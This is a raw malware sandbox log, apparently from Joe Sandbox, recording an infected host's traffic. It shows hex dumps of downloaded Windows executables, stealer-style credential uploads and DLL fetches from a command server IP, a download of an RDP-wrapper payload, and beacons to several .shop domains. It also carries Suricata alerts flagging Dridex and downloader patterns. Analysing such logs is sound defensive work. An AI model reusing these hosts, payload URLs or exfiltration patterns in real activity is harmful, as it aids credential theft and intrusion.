Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:29:07 GMTContent-Type: application/octet-streamContent-Length: 413224Last-Modified: Thu, 26 Sep 2024 22:09:34 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5db9e-64e28"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 ed da f5 66 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0b 00 00 1e 06 00 00 08 00 00 00 00 00 00 3e 3c 06 00 00 20 00 00 00 40 06 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 06 00 00 02 00 00 00 00 00 00 03 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 e8 3b 06 00 53 00 00 00 00 40 06 00 c8 05 00 00 00 00 00 00 00 00 00 00 00 28 06 00 28 26 00 00 00 60 06 00 0c 00 00 00 b0 3a 06 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 44 1c 06 00 00 20 00 00 00 1e 06 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 c8 05 00 00 00 40 06 00 00 06 00 00 00 20 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 06 00 00 02 00 00 00 26 06 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 3c 06 00 00 00 00 00 48 00 00 00 02 00 05 00 80 2a 06 00 30 10 00 00 03 00 02 00 12 00 00 06 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 88 91 bf 5e 83 38 3d 2e 1f 51 05 cf 88 76 20 41 c7 95 33 5b 52 f9 4a 2a f9 82 5f c1 c3 ff 82 66 8e 1a 39 be 5c 6c 9b f9 76 43 23 53 73 6e 42 7e af 45 c2 d5 7e e6 69 03 87 37 0a 7d 2b f1 56 fc 0f ec 23 c9 db 38 17 bf 66 d1 23 58 57 9c b5 06 ce 62 88 e7 bd 91 11 28 94 81 83 aa 92 c9 c2 8e d2 87 dd ec a8 98 87 c8 07 8b 3c 4f b6 ac bf ed bf 07 19 c0 31 1b 24 cc 3d 55 4e 38 dd 29 a8 19 4c 4c 7f 0c af ed 28 4b fe 03 12 d6 b5 2c 72 c8 ca d7 b3 ae c5 9b 25 39 15 4c 9f 59 0e 3d 30 c4 b5 89 54 34 83 26 8a bd 1f 9d 1e 64 ee d4 ba 2e 0a 28 55 17 81 d3 ce 92 27 3d 22 80 85 94 28 3e e0 64 98 7f 2b f2 0c 39 32 a5 1a ac 70 38 c5 31 9a 90 50 61 5c 71 b7 ee e5 d8 af 5d 58 96 2f 61 fc 40 30 43 ff 50 51 8c b9 d4 42 fc 07 ed 76 89 17 36 04 04 f7 d0 6c 65 32 07 b1 95 85 34 49 33 02 b4 02 02 ce d3 d2 50 a3 43 3a 11 09 b2 76 98 7d 89 51 c9 77 70 11 89 53 28 41 ec 51 67 16 27 16 0b 4e 09 04 5f 58 f5 6d 76 67 ba 1c d
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:29:09 GMTContent-Type: application/octet-streamContent-Length: 73216Last-Modified: Thu, 26 Sep 2024 22:21:38 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f5de72-11e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 32 a3 40 a0 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 30 00 00 04 01 00 00 18 00 00 00 00 00 00 fe 21 01 00 00 20 00 00 00 40 01 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 80 01 00 00 02 00 00 00 00 00 00 02 00 60 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 b0 21 01 00 4b 00 00 00 00 40 01 00 17 14 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 04 02 01 00 00 20 00 00 00 04 01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 17 14 00 00 00 40 01 00 00 16 00 00 00 06 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 60 01 00 00 02 00 00 00 1c 01 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e0 21 01 00 00 00 00 00 48 00 00 00 02 00 05 00 5c fc 00 00 54 25 00 00 03 00 02 00 06 00 00 06 68 2c 00 00 f4 cf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 1a 28 22 00 00 06 2a 1e 02 28 1a 00 00 0a 2a 36 02 7c 07 00 00 04 03 28 30 00 00 0a 2a 56 73 31 00 00 0a 72 0e 02 00 70 28 02 00 00 06 28 32 00 00 0a 2a 4a 73 31 00 00 0a 02 73 33 00 00 0a 03 28 34 00 00 0a 2a 5a 72 b6 02 00 70 28 02 00 00 06 28 11 00 00 06 02 6f 45 00 00 0a 2a b2 02 28 4e 00 00 0a 3a 01 00 00 00 2a 72 1c 03 00 70 28 02 00 00 06 02 72 36 03 00 70 28 02 00 00 06 28 4f 00 00 0a 28 10 00 00 06 2a e6 72 28 04 00 70 28 02 00 00 06 28 11 00 00 06 72 5a 04 00 70 28 02 00 00 06 6f 45 00 00 0a 3a 0b 00 00 00 72 8c 04 00 70 28 02 00 00 06 2a 72 5a 04 00 70 28 02 00 00 06 2a aa 72 5d 06 00 70 28 02 00 00 06 02 7b 0a 00 00 04 72 5d 06 00 70 28 02 00 00 06 28 52 00 00 0a 6f 53 00 00 0a 28 54 00 00 0a 2a 62 02 3a 0b 00 00 00 72 10 07 00 70 28 02 00 00 06 2a 02 6f 55 00 00 0a 2a 13 30 04 00 6e 00 00 00 01 00 00 11 00 02 28 0a 00 00 0a 0a 73 0b 00 00 0a 28 0c 00 00 0a 72 01 00 00 70 6f 0d 00 00
Source: global traffic	HTTP traffic detected: HTTP/1.1 200 OKServer: nginxDate: Thu, 26 Sep 2024 22:29:10 GMTContent-Type: application/octet-streamContent-Length: 1785344Last-Modified: Thu, 26 Sep 2024 12:36:03 GMTConnection: keep-aliveKeep-Alive: timeout=120ETag: "66f55533-1b3e00"X-Content-Type-Options: nosniffAccept-Ranges: bytesData Raw: 4d 5a 50 00 02 00 00 00 04 00 0f 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 ba 10 00 0e 1f b4 09 cd 21 b8 01 4c cd 21 90 90 54 68 69 73 20 70 72 6f 67 72 61 6d 20 6d 75 73 74 20 62 65 20 72 75 6e 20 75 6e 64 65 72 20 57 69 6e 33 32 0d 0a 24 37 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 09 00 23 d6 43 5a 00 00 00 00 00 00 00 00 e0 00 8e 81 0b 01 02 19 00 34 04 00 00 06 17 00 00 00 00 00 3c 37 04 00 00 10 00 00 00 50 04 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 00 00 00 00 00 00 05 00 00 00 00 00 00 00 00 e0 1b 00 00 04 00 00 17 f6 1b 00 03 00 00 00 00 00 10 00 00 40 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 00 c0 04 00 f8 12 00 00 00 60 05 00 ed 7b 16 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 05 00 fc 5e 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 04 00 18 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 c3 04 00 d0 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 20 12 04 00 00 10 00 00 00 14 04 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 69 74 65 78 74 00 00 7c 1e 00 00 00 30 04 00 00 20 00 00 00 18 04 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 64 61 74 61 00 00 00 78 12 00 00 00 50 04 00 00 14 00 00 00 38 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 62 73 73 00 00 00 00 c0 4f 00 00 00 70 04 00 00 00 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 69 64 61 74 61 00 00 f8 12 00 00 00 c0 04 00 00 14 00 00 00 4c 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 c0 2e 74 6c 73 00 00 00 00 10 00 00 00 00 e0 04 00 00 00 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 2e 72 64 61 74 61 00 00 18 00 00 00 00 f0 04 00 00 02 00 00 00 60 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 fc 5e 00 00 00 00 05 00 00 60 00 00 00 62 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 2e 72 73 72 63 00 00 00 ed 7b 16 00 00 60 05 00 00 7c 16 00 00 c2 04 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 70 17 00 00 00 00 00 00 cc 16 00 00 00 00 00 00 00

Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /receive.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: hansgborn.euContent-Length: 58Expect: 100-continueConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org

Source: Joe Sandbox View	IP Address: 104.21.77.130 104.21.77.130
Source: Joe Sandbox View	IP Address: 147.45.44.104 147.45.44.104

Source: Joe Sandbox View	ASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
Source: Joe Sandbox View	ASN Name: AS-PUBMATICUS AS-PUBMATICUS

Source: Joe Sandbox View	JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Joe Sandbox View	JA3 fingerprint: 51c64c77e60f3980eea90869b68c58a8
Source: Joe Sandbox View	JA3 fingerprint: a0e9f5d64349fb13191bc781f81f42e1
Source: Joe Sandbox View	JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57880 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57879 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57881 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57882 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57878 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57884 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57883 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57886 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57877 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57885 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57888 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57890 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57891 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57887 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57893 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57892 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57894 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57897 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57900 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57895 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57896 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57902 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57905 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57899 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57909 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803270 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UHCa : 192.168.2.6:57901 -> 147.45.44.104:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57913 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57927 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57926 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57929 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57932 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57928 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57931 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57930 -> 5.75.211.162:443
Source: Network traffic	Suricata IDS: 2803305 - Severity 3 - ETPRO MALWARE Common Downloader Header Pattern H : 192.168.2.6:57921 -> 172.67.74.152:80
Source: Network traffic	Suricata IDS: 2028765 - Severity 3 - ET JA3 Hash - [Abuse.ch] Possible Dridex : 192.168.2.6:57933 -> 5.75.211.162:443

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CFBAKKJDBKJJJKFHDAEBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCAKKKEGCAKJKFIIEGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IJKFIIIJJKJJKEBGIDGCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FIDHIEBAAKJDHIECAAFHUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 332Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 6217Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JJDBAEHIJKJKEBFIEGHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 829Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCFCFHJDBKJKEBFHJEHIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKJDGDHIDBGIECBGHJDBUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 437Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----CGCAKKKEGCAKJKFIIEGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 1025Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----ECGHJJEHDHCAAKFIIDGIUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJEUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----FHCGCAAKJDHJJJJJKKKFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 461Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----AEHIJDAFBKFHIDGCFBFCUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 114353Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 331Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----JEBGIIDBKEBFBGCAEBAKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: wallkedsleeoi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: gutterydhowi.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: ghostreedmnu.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----IEBFHCAKFBGDHIDHIDBKUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: offensivedzvju.shop
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: vozmeatillu.shop
Source: global traffic	HTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----BFCFBFBFBKFIDHJKFCAFUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 499Connection: Keep-AliveCache-Control: no-cache
Source: global traffic	HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: drawzhotdog.shop
